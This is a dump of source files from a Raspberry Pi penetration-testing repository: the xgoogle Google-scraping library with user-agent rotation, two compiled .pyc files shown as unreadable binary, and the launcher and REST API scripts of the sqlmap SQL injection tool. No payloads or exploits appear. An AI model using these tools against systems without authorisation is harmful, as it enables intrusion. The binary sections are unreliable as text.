            self._maybe_raise(SLParseError, "Title tag in sponsored link was not found", result)
            return None, None
        title = ''.join(title_a.findAll(text=True))
        title = self._html_unescape(title)
        url = title_a['href']
        match = re.search(r'q=(http[^&]+)&', url)
        if not match:
            self._maybe_raise(SLParseError, "URL inside a sponsored link was not found", result)
            return None, None
        url = urllib.unquote(match.group(1))
        return title, url

    def _extract_display_url(self, result):
        cite = result.find('cite')
        if not cite:
            self._maybe_raise(SLParseError, "<cite> not found inside result", result)
            return None
        return ''.join(cite.findAll(text=True))

    def _extract_description(self, result):
        cite = result.find('cite')
        if not cite:
            return None
        cite.extract()
        desc_div = result.find('div', {'class': 'line23'})
        if not desc_div:
            self._maybe_raise(SLParseError, "Description tag not found in sponsored link", result)
            return None
        desc_strs = desc_div.findAll(text=True)[0:-1]
        desc = ''.join(desc_strs)
        desc = desc.replace("\n", " ")
        desc = desc.replace("  ", " ")
        return self._html_unescape(desc)

    def _html_unescape(self, str):
        def entity_replacer(m):
            entity = m.group(1)
            if entity in name2codepoint:
                return unichr(name2codepoint[entity])
            else:
                return m.group(0)

        def ascii_replacer(m):
            cp = int(m.group(1))
            if cp <= 255:
                return unichr(cp)
            else:
                return m.group(0)

        # re.U is a compile flag, so bake it into the pattern objects rather
        # than passing it as re.sub()'s fourth positional argument (count)
        s = re.compile(r'&#(\d+);', re.U).sub(ascii_replacer, str)
        return re.compile(r'&([^;]+);', re.U).sub(entity_replacer, s)
7,999
Python
.py
197
30.360406
116
0.574666
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
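A minimal usage sketch for the SponsoredLinks scraper above, in Python 2 like the library itself. The package path xgoogle.sponsoredlinks and the query string are illustrative assumptions, not part of the row:

from xgoogle.sponsoredlinks import SponsoredLinks, SLError  # assumed package layout

try:
    sl = SponsoredLinks("wordpress hosting", random_agent=True)  # hypothetical query
    print "total sponsored results:", sl.num_results
    for link in sl.get_results():          # one page per call; call again for the next page
        print link.title, "->", link.url
except SLError, e:
    print "sponsored-links search failed:", e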
18,919
translate.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/translate.py
#!/usr/bin/python
#
# Peteris Krumins (peter@catonmat.net)
# http://www.catonmat.net -- good coders code, great reuse
#
# http://www.catonmat.net/blog/python-library-for-google-translate/
#
# Code is licensed under MIT license.
#

from browser import Browser, BrowserError
from urllib import quote_plus

import simplejson as json

class TranslationError(Exception):
    pass

class Translator(object):
    translate_url = "http://ajax.googleapis.com/ajax/services/language/translate?v=1.0&q=%(message)s&langpair=%(from)s%%7C%(to)s"

    def __init__(self):
        self.browser = Browser()

    def translate(self, message, lang_to='en', lang_from=''):
        """
        Given a 'message' translate it from 'lang_from' to 'lang_to'.
        If 'lang_from' is empty, auto-detects the language.
        Returns the translated message.
        """
        if lang_to not in _languages:
            raise TranslationError, "Language %s is not supported as lang_to." % lang_to
        if lang_from not in _languages and lang_from != '':
            raise TranslationError, "Language %s is not supported as lang_from." % lang_from

        message = quote_plus(message)
        real_url = Translator.translate_url % { 'message': message,
                                                'from': lang_from,
                                                'to': lang_to }

        try:
            translation = self.browser.get_page(real_url)
            data = json.loads(translation)

            if data['responseStatus'] != 200:
                raise TranslationError, "Failed translating: %s" % data['responseDetails']

            return data['responseData']['translatedText']
        except BrowserError, e:
            raise TranslationError, "Failed translating (getting %s failed): %s" % (e.url, e.error)
        except ValueError, e:
            raise TranslationError, "Failed translating (json failed): %s" % e.message
        except KeyError, e:
            raise TranslationError, "Failed translating, response didn't contain the translation"

        return None

class DetectionError(Exception):
    pass

class Language(object):
    def __init__(self, lang, confidence, is_reliable):
        self.lang_code = lang
        self.lang = _languages[lang]
        self.confidence = confidence
        self.is_reliable = is_reliable

    def __repr__(self):
        return '<Language: %s (%s)>' % (self.lang_code, self.lang)

class LanguageDetector(object):
    detect_url = "http://ajax.googleapis.com/ajax/services/language/detect?v=1.0&q=%(message)s"

    def __init__(self):
        self.browser = Browser()

    def detect(self, message):
        """
        Given a 'message' detects its language.
        Returns Language object.
        """
        message = quote_plus(message)
        real_url = LanguageDetector.detect_url % { 'message': message }

        try:
            detection = self.browser.get_page(real_url)
            data = json.loads(detection)

            if data['responseStatus'] != 200:
                # bug fix: the original raised the undefined names DetectError
                # and DetectErrro; the class defined above is DetectionError
                raise DetectionError, "Failed detecting language: %s" % data['responseDetails']

            rd = data['responseData']
            return Language(rd['language'], rd['confidence'], rd['isReliable'])

        except BrowserError, e:
            raise DetectionError, "Failed detecting language (getting %s failed): %s" % (e.url, e.error)
        except ValueError, e:
            raise DetectionError, "Failed detecting language (json failed): %s" % e.message
        except KeyError, e:
            raise DetectionError, "Failed detecting language, response didn't contain the necessary data"

        return None

# note: 'tl' appears twice below ('Filipino' and 'Tagalog'); in a Python dict
# literal the later entry wins, so 'tl' resolves to 'Tagalog'
_languages = {
    'af': 'Afrikaans', 'sq': 'Albanian', 'am': 'Amharic', 'ar': 'Arabic',
    'hy': 'Armenian', 'az': 'Azerbaijani', 'eu': 'Basque', 'be': 'Belarusian',
    'bn': 'Bengali', 'bh': 'Bihari', 'bg': 'Bulgarian', 'my': 'Burmese',
    'ca': 'Catalan', 'chr': 'Cherokee', 'zh': 'Chinese', 'zh-CN': 'Chinese_simplified',
    'zh-TW': 'Chinese_traditional', 'hr': 'Croatian', 'cs': 'Czech', 'da': 'Danish',
    'dv': 'Dhivehi', 'nl': 'Dutch', 'en': 'English', 'eo': 'Esperanto',
    'et': 'Estonian', 'tl': 'Filipino', 'fi': 'Finnish', 'fr': 'French',
    'gl': 'Galician', 'ka': 'Georgian', 'de': 'German', 'el': 'Greek',
    'gn': 'Guarani', 'gu': 'Gujarati', 'iw': 'Hebrew', 'hi': 'Hindi',
    'hu': 'Hungarian', 'is': 'Icelandic', 'id': 'Indonesian', 'iu': 'Inuktitut',
    'ga': 'Irish', 'it': 'Italian', 'ja': 'Japanese', 'kn': 'Kannada',
    'kk': 'Kazakh', 'km': 'Khmer', 'ko': 'Korean', 'ku': 'Kurdish',
    'ky': 'Kyrgyz', 'lo': 'Laothian', 'lv': 'Latvian', 'lt': 'Lithuanian',
    'mk': 'Macedonian', 'ms': 'Malay', 'ml': 'Malayalam', 'mt': 'Maltese',
    'mr': 'Marathi', 'mn': 'Mongolian', 'ne': 'Nepali', 'no': 'Norwegian',
    'or': 'Oriya', 'ps': 'Pashto', 'fa': 'Persian', 'pl': 'Polish',
    'pt-PT': 'Portuguese', 'pa': 'Punjabi', 'ro': 'Romanian', 'ru': 'Russian',
    'sa': 'Sanskrit', 'sr': 'Serbian', 'sd': 'Sindhi', 'si': 'Sinhalese',
    'sk': 'Slovak', 'sl': 'Slovenian', 'es': 'Spanish', 'sw': 'Swahili',
    'sv': 'Swedish', 'tg': 'Tajik', 'ta': 'Tamil', 'tl': 'Tagalog',
    'te': 'Telugu', 'th': 'Thai', 'bo': 'Tibetan', 'tr': 'Turkish',
    'uk': 'Ukrainian', 'ur': 'Urdu', 'uz': 'Uzbek', 'ug': 'Uighur',
    'vi': 'Vietnamese', 'cy': 'Welsh', 'yi': 'Yiddish'
}
5,645
Python
.py
173
25.647399
130
0.569373
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
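Translator and LanguageDetector above wrap the old Google AJAX Language API, which has since been shut down, so what follows is a historical sketch of the intended call pattern; the sample strings are made up:

from xgoogle.translate import Translator, TranslationError, LanguageDetector

t = Translator()
try:
    # lang_from='' (the default) asks the service to auto-detect the source language
    print t.translate("Bonjour tout le monde", lang_to="en")
except TranslationError, e:
    print "translation failed:", e

d = LanguageDetector()
lang = d.detect("Hola mundo")              # returns a Language object
print lang.lang_code, lang.lang, lang.confidence, lang.is_reliable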
18,920
BeautifulSoup.pyc
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/BeautifulSoup.pyc
[Binary content omitted: this row is a compiled CPython .pyc, not source text. The only recoverable strings identify it as BeautifulSoup 3.0.6 ("Beautiful Soup, Elixir and Tonic, 'The Screen-Scraper's Friend'", http://www.crummy.com/software/BeautifulSoup/) by Leonard Richardson, copyright 2004-2008, New-style BSD license; the remaining bytes are bytecode rendered as mojibake.]
66,285
Python
.pyc
468
137.935897
2,193
0.45339
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,921
browser.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/browser.py
#!/usr/bin/python
#
# Peteris Krumins (peter@catonmat.net)
# http://www.catonmat.net -- good coders code, great reuse
#
# http://www.catonmat.net/blog/python-library-for-google-search/
#
# Code is licensed under MIT license.
#

import random
import socket
import urllib
import urllib2
import httplib

BROWSERS = (
    # Top most popular browsers in my access.log on 2009.02.12
    # tail -50000 access.log |
    #  awk -F\" '{B[$6]++} END { for (b in B) { print B[b] ": " b } }' |
    #  sort -rn |
    #  head -20
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6',
    'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)',
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6',
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6',
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19',
    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)',
    'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6',
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121621 Ubuntu/8.04 (hardy) Firefox/3.0.5',
    'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)',
    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
)

TIMEOUT = 5 # socket timeout

class BrowserError(Exception):
    def __init__(self, url, error):
        self.url = url
        self.error = error

class PoolHTTPConnection(httplib.HTTPConnection):
    def connect(self):
        """Connect to the host and port specified in __init__."""
        msg = "getaddrinfo returns an empty list"
        for res in socket.getaddrinfo(self.host, self.port, 0, socket.SOCK_STREAM):
            af, socktype, proto, canonname, sa = res
            try:
                self.sock = socket.socket(af, socktype, proto)
                if self.debuglevel > 0:
                    print "connect: (%s, %s)" % (self.host, self.port)
                self.sock.settimeout(TIMEOUT)
                self.sock.connect(sa)
            except socket.error, msg:
                if self.debuglevel > 0:
                    print 'connect fail:', (self.host, self.port)
                if self.sock:
                    self.sock.close()
                self.sock = None
                continue
            break
        if not self.sock:
            raise socket.error, msg

class PoolHTTPHandler(urllib2.HTTPHandler):
    def http_open(self, req):
        return self.do_open(PoolHTTPConnection, req)

class Browser(object):
    def __init__(self, user_agent=BROWSERS[0], debug=False, use_pool=False):
        self.headers = {
            'User-Agent': user_agent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-us,en;q=0.5'
        }
        self.debug = debug

    def get_page(self, url, data=None):
        handlers = [PoolHTTPHandler]
        opener = urllib2.build_opener(*handlers)
        if data:
            data = urllib.urlencode(data)
        request = urllib2.Request(url, data, self.headers)
        try:
            response = opener.open(request)
            return response.read()
        except (urllib2.HTTPError, urllib2.URLError), e:
            raise BrowserError(url, str(e))
        except (socket.error, socket.sslerror), msg:
            raise BrowserError(url, msg)
        except socket.timeout, e:
            raise BrowserError(url, "timeout")
        except KeyboardInterrupt:
            raise
        except:
            raise BrowserError(url, "unknown error")

    def set_random_user_agent(self):
        self.headers['User-Agent'] = random.choice(BROWSERS)
        return self.headers['User-Agent']
4,597
Python
.py
95
39
144
0.599063
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
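A minimal sketch of the Browser wrapper above: it funnels every network failure into BrowserError and can rotate through the canned BROWSERS user-agent strings. The URL is a placeholder:

from xgoogle.browser import Browser, BrowserError

b = Browser(debug=False)
b.set_random_user_agent()                  # pick a random entry from BROWSERS
try:
    html = b.get_page("http://www.example.com/")   # placeholder URL
    print "%d bytes fetched" % len(html)
except BrowserError, e:
    print "fetch failed for %s: %s" % (e.url, e.error)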
18,922
search.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/search.py
#!/usr/bin/python
#
# Peteris Krumins (peter@catonmat.net)
# http://www.catonmat.net -- good coders code, great reuse
#
# http://www.catonmat.net/blog/python-library-for-google-search/
#
# Code is licensed under MIT license.
#

import re
import urllib
from htmlentitydefs import name2codepoint
from BeautifulSoup import BeautifulSoup

from browser import Browser, BrowserError

class SearchError(Exception):
    """
    Base class for Google Search exceptions.
    """
    pass

class ParseError(SearchError):
    """
    Parse error in Google results.
    self.msg attribute contains explanation why parsing failed
    self.tag attribute contains BeautifulSoup object with the most
    relevant tag that failed to parse
    Thrown only in debug mode
    """
    def __init__(self, msg, tag):
        self.msg = msg
        self.tag = tag

    def __str__(self):
        return self.msg

    def html(self):
        return self.tag.prettify()

class SearchResult:
    def __init__(self, title, url, desc):
        self.title = title
        self.url = url
        self.desc = desc

    def __str__(self):
        return 'Google Search Result: "%s"' % self.title

class GoogleSearch(object):
    SEARCH_URL_0 = "http://www.google.com/search?hl=en&q=%(query)s&btnG=Google+Search"
    NEXT_PAGE_0 = "http://www.google.com/search?hl=en&q=%(query)s&start=%(start)d"
    SEARCH_URL_1 = "http://www.google.com/search?hl=en&q=%(query)s&num=%(num)d&btnG=Google+Search"
    NEXT_PAGE_1 = "http://www.google.com/search?hl=en&q=%(query)s&num=%(num)d&start=%(start)d"

    def __init__(self, query, random_agent=False, debug=False):
        self.query = query
        self.debug = debug
        self.browser = Browser(debug=debug)
        self.results_info = None
        self.eor = False # end of results
        self._page = 0
        self._results_per_page = 10
        self._last_from = 0

        if random_agent:
            self.browser.set_random_user_agent()

    @property
    def num_results(self):
        if not self.results_info:
            page = self._get_results_page()
            self.results_info = self._extract_info(page)
            if self.results_info['total'] == 0:
                self.eor = True
        return self.results_info['total']

    def _get_page(self):
        return self._page

    def _set_page(self, page):
        self._page = page

    page = property(_get_page, _set_page)

    def _get_results_per_page(self):
        return self._results_per_page

    def _set_results_par_page(self, rpp):
        self._results_per_page = rpp

    results_per_page = property(_get_results_per_page, _set_results_par_page)

    def get_results(self):
        """ Gets a page of results """
        if self.eor:
            return []
        page = self._get_results_page()
        search_info = self._extract_info(page)
        if not self.results_info:
            self.results_info = search_info
            if self.num_results == 0:
                self.eor = True
                return []
        results = self._extract_results(page)
        if not results:
            self.eor = True
            return []
        if self._page > 0 and search_info['from'] == self._last_from:
            self.eor = True
            return []
        if search_info['to'] == search_info['total']:
            self.eor = True
        self._page += 1
        self._last_from = search_info['from']
        return results

    def _maybe_raise(self, cls, *arg):
        if self.debug:
            raise cls(*arg)

    def _get_results_page(self):
        if self._page == 0:
            if self._results_per_page == 10:
                url = GoogleSearch.SEARCH_URL_0
            else:
                url = GoogleSearch.SEARCH_URL_1
        else:
            if self._results_per_page == 10:
                url = GoogleSearch.NEXT_PAGE_0
            else:
                url = GoogleSearch.NEXT_PAGE_1

        safe_url = url % { 'query': urllib.quote_plus(self.query),
                           'start': self._page * self._results_per_page,
                           'num': self._results_per_page }

        try:
            page = self.browser.get_page(safe_url)
        except BrowserError, e:
            raise SearchError, "Failed getting %s: %s" % (e.url, e.error)

        return BeautifulSoup(page)

    def _extract_info(self, soup):
        empty_info = {'from': 0, 'to': 0, 'total': 0}
        div_ssb = soup.find('div', id='ssb')
        if not div_ssb:
            self._maybe_raise(ParseError, "Div with number of results was not found on Google search page", soup)
            return empty_info
        p = div_ssb.find('p')
        if not p:
            self._maybe_raise(ParseError, """<p> tag within <div id="ssb"> was not found on Google search page""", soup)
            return empty_info
        txt = ''.join(p.findAll(text=True))
        txt = txt.replace(',', '')
        matches = re.search(r'Results (\d+) - (\d+) of (?:about )?(\d+)', txt, re.U)
        if not matches:
            return empty_info
        return {'from': int(matches.group(1)),
                'to': int(matches.group(2)),
                'total': int(matches.group(3))}

    def _extract_results(self, soup):
        results = soup.findAll('li', {'class': 'g'})
        ret_res = []
        for result in results:
            eres = self._extract_result(result)
            if eres:
                ret_res.append(eres)
        return ret_res

    def _extract_result(self, result):
        title, url = self._extract_title_url(result)
        desc = self._extract_description(result)
        if not title or not url or not desc:
            return None
        return SearchResult(title, url, desc)

    def _extract_title_url(self, result):
        #title_a = result.find('a', {'class': re.compile(r'\bl\b')})
        title_a = result.find('a')
        if not title_a:
            self._maybe_raise(ParseError, "Title tag in Google search result was not found", result)
            return None, None
        title = ''.join(title_a.findAll(text=True))
        title = self._html_unescape(title)
        url = title_a['href']
        match = re.match(r'/url\?q=(http[^&]+)&', url)
        if match:
            url = urllib.unquote(match.group(1))
        return title, url

    def _extract_description(self, result):
        desc_div = result.find('div', {'class': re.compile(r'\bs\b')})
        if not desc_div:
            self._maybe_raise(ParseError, "Description tag in Google search result was not found", result)
            return None

        desc_strs = []
        def looper(tag):
            if not tag:
                return
            for t in tag:
                try:
                    if t.name == 'br':
                        break
                except AttributeError:
                    pass

                try:
                    desc_strs.append(t.string)
                except AttributeError:
                    desc_strs.append(t)

        looper(desc_div)
        looper(desc_div.find('wbr')) # BeautifulSoup does not self-close <wbr>

        desc = ''.join(s for s in desc_strs if s)
        return self._html_unescape(desc)

    def _html_unescape(self, str):
        def entity_replacer(m):
            entity = m.group(1)
            if entity in name2codepoint:
                return unichr(name2codepoint[entity])
            else:
                return m.group(0)

        def ascii_replacer(m):
            cp = int(m.group(1))
            if cp <= 255:
                return unichr(cp)
            else:
                return m.group(0)

        # bug fix: re.sub's fourth positional argument is a replacement count,
        # not flags, so passing re.U there was a silent no-op; use inline (?u)
        s = re.sub(r'(?u)&#(\d+);', ascii_replacer, str)
        return re.sub(r'(?u)&([^;]+);', entity_replacer, s)
7,660
Python
.py
198
29.050505
120
0.567269
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
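A minimal paging sketch for GoogleSearch above: get_results() returns one page per call and flips self.eor to True once Google stops returning new results. The query is hypothetical:

from xgoogle.search import GoogleSearch, SearchError

try:
    gs = GoogleSearch("inurl:wp-content", random_agent=True)   # hypothetical query
    gs.results_per_page = 25
    while not gs.eor:
        for res in gs.get_results():       # [] once the result pages run out
            print res.title.encode("utf-8"), "|", res.url
except SearchError, e:
    print "search failed:", e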
18,923
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/__init__.py
#!/usr/bin/python
#
# Peteris Krumins (peter@catonmat.net)
# http://www.catonmat.net -- good coders code, great reuse
#
# A Google Python library:
# http://www.catonmat.net/blog/python-library-for-google-search/
#
# Distributed under MIT license:
#
# Copyright (c) 2009 Peteris Krumins
#
# Permission is hereby granted, free of charge, to any person
# Obtaining a copy of this software and associated documentation
# Files (the "Software"), to deal in the Software without
# Restriction, including without limitation the rights to use,
# Copy, modify, merge, publish, distribute, sublicense, and/or sell
# Copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# Conditions:
#
# The above copyright notice and this permission notice shall be
# Included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
1,354
Python
.py
33
40
67
0.783333
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,924
googlesets.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/googlesets.py
#!/usr/bin/python # # Peteris Krumins (peter@catonmat.net) # http://www.catonmat.net -- good coders code, great reuse # # http://www.catonmat.net/blog/python-library-for-google-sets/ # # Code is licensed under MIT license. # import re import urllib import random from htmlentitydefs import name2codepoint from BeautifulSoup import BeautifulSoup from browser import Browser, BrowserError class GSError(Exception): """ Google Sets Error """ pass class GSParseError(Exception): """ Parse error in Google Sets results. self.msg attribute contains explanation why parsing failed self.tag attribute contains BeautifulSoup object with the most relevant tag that failed to parse Thrown only in debug mode """ def __init__(self, msg, tag): self.msg = msg self.tag = tag def __str__(self): return self.msg def html(self): return self.tag.prettify() LARGE_SET = 1 SMALL_SET = 2 class GoogleSets(object): URL_LARGE = "http://labs.google.com/sets?hl=en&q1=%s&q2=%s&q3=%s&q4=%s&q5=%s&btn=Large+Set" URL_SMALL = "http://labs.google.com/sets?hl=en&q1=%s&q2=%s&q3=%s&q4=%s&q5=%s&btn=Small+Set+(15+items+or+fewer)" def __init__(self, items, random_agent=False, debug=False): self.items = items self.debug = debug self.browser = Browser(debug=debug) if random_agent: self.browser.set_random_user_agent() def get_results(self, set_type=SMALL_SET): page = self._get_results_page(set_type) results = self._extract_results(page) return results def _maybe_raise(self, cls, *arg): if self.debug: raise cls(*arg) def _get_results_page(self, set_type): if set_type == LARGE_SET: url = GoogleSets.URL_LARGE else: url = GoogleSets.URL_SMALL safe_items = [urllib.quote_plus(i) for i in self.items] blank_items = 5 - len(safe_items) if blank_items > 0: safe_items += ['']*blank_items safe_url = url % tuple(safe_items) try: page = self.browser.get_page(safe_url) except BrowserError, e: raise GSError, "Failed getting %s: %s" % (e.url, e.error) return BeautifulSoup(page) def _extract_results(self, soup): a_links = soup.findAll('a', href=re.compile('/search')) ret_res = [a.string for a in a_links] return ret_res
2,548
Python
.py
69
29.231884
116
0.625719
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
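The GoogleSets class above pads its seed list to five items and scrapes the labs.google.com endpoint, which Google discontinued long ago, so the following usage sketch (Python 2) is illustrative only.

# Sketch: expand a seed list via Google Sets (the service no longer exists)
from xgoogle.googlesets import GoogleSets, LARGE_SET

gs = GoogleSets(["python", "perl", "ruby"], random_agent=True)
for item in gs.get_results(set_type=LARGE_SET):
    print item                             # related terms scraped from the page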
18,925
search.pyc
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/search.pyc
[binary content omitted: search.pyc is compiled CPython 2 bytecode of xgoogle/search.py (whose source appears above) and is not representable as text]
9,179
Python
.py
42
216.833333
1,181
0.385861
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,926
sqlmap.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/sqlmap.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import bdb import inspect import logging import os import re import sys import time import traceback import warnings warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) warnings.filterwarnings(action="ignore", category=DeprecationWarning) from lib.utils import versioncheck # this has to be the first non-standard import from lib.controller.controller import start from lib.core.common import banner from lib.core.common import createGithubIssue from lib.core.common import dataToStdout from lib.core.common import getUnicode from lib.core.common import maskSensitiveData from lib.core.common import setColor from lib.core.common import setPaths from lib.core.common import weAreFrozen from lib.core.data import cmdLineOptions from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.common import unhandledExceptionMessage from lib.core.exception import SqlmapBaseException from lib.core.exception import SqlmapShellQuitException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapUserQuitException from lib.core.option import initOptions from lib.core.option import init from lib.core.profiling import profile from lib.core.settings import LEGAL_DISCLAIMER from lib.core.testing import smokeTest from lib.core.testing import liveTest from lib.parse.cmdline import cmdLineParser from lib.utils.api import setRestAPILog from lib.utils.api import StdDbOut def modulePath(): """ This will get us the program's directory, even if we are frozen using py2exe """ try: _ = sys.executable if weAreFrozen() else __file__ except NameError: _ = inspect.getsourcefile(modulePath) return os.path.dirname(os.path.realpath(getUnicode(_, sys.getfilesystemencoding()))) def main(): """ Main function of sqlmap when running from command line. """ try: paths.SQLMAP_ROOT_PATH = modulePath() setPaths() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) if hasattr(conf, "api"): # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() banner() conf.showTime = True dataToStdout("[!] 
legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) init() if conf.profile: profile() elif conf.smokeTest: smokeTest() elif conf.liveTest: liveTest() else: start() except SqlmapUserQuitException: errMsg = "user quit" logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getUnicode(ex.message) logger.critical(errMsg) sys.exit(1) except KeyboardInterrupt: print errMsg = "user aborted" logger.error(errMsg) except EOFError: print errMsg = "exit" logger.error(errMsg) except SystemExit: pass except: print errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') file_ = re.sub(r"\.\./", '/', file_).lstrip('/') excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) logger.critical(errMsg) kb.stickyLevel = logging.CRITICAL dataToStdout(excMsg) createGithubIssue(errMsg, excMsg) finally: if conf.get("showTime"): dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) kb.threadContinue = False kb.threadException = True if conf.get("hashDB"): try: conf.hashDB.flush(True) except KeyboardInterrupt: pass if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() main() if hasattr(conf, "api"): try: conf.database_cursor.disconnect() except KeyboardInterrupt: pass if conf.get("dumper"): conf.dumper.flush() # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program if conf.get("threads", 0) > 1 or conf.get("dnsServer"): os._exit(0) if __name__ == "__main__": main()
5,343
Python
.py
148
29.135135
103
0.674612
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
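modulePath() above must work both when sqlmap runs from source and when it is frozen with py2exe, where __file__ no longer exists. A standalone sketch of that idiom (Python 2), assuming a py2exe-style freezer that sets sys.frozen:

import os
import sys

def program_directory():
    # Freezers such as py2exe set sys.frozen and drop __file__,
    # so fall back to the executable's own path in that case.
    path = sys.executable if hasattr(sys, "frozen") else __file__
    return os.path.dirname(os.path.realpath(path))

print program_directory()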
18,927
sqlmapapi.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/sqlmapapi.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import logging import optparse from sqlmap import modulePath from lib.core.common import setPaths from lib.core.data import paths from lib.core.data import logger from lib.utils.api import client from lib.utils.api import server RESTAPI_SERVER_HOST = "127.0.0.1" RESTAPI_SERVER_PORT = 8775 if __name__ == "__main__": """ REST-JSON API main function """ # Set default logging level to debug logger.setLevel(logging.DEBUG) # Initialize path variable paths.SQLMAP_ROOT_PATH = modulePath() setPaths() # Parse command line options apiparser = optparse.OptionParser() apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_SERVER_PORT, action="store_true") apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_SERVER_PORT, action="store_true") apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server", default=RESTAPI_SERVER_HOST, action="store") apiparser.add_option("-p", "--port", help="Port of the REST-JSON API server", default=RESTAPI_SERVER_PORT, type="int", action="store") (args, _) = apiparser.parse_args() # Start the client or the server if args.server is True: server(args.host, args.port) elif args.client is True: client(args.host, args.port) else: apiparser.print_help()
1,534
Python
.py
38
36.526316
142
0.709005
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
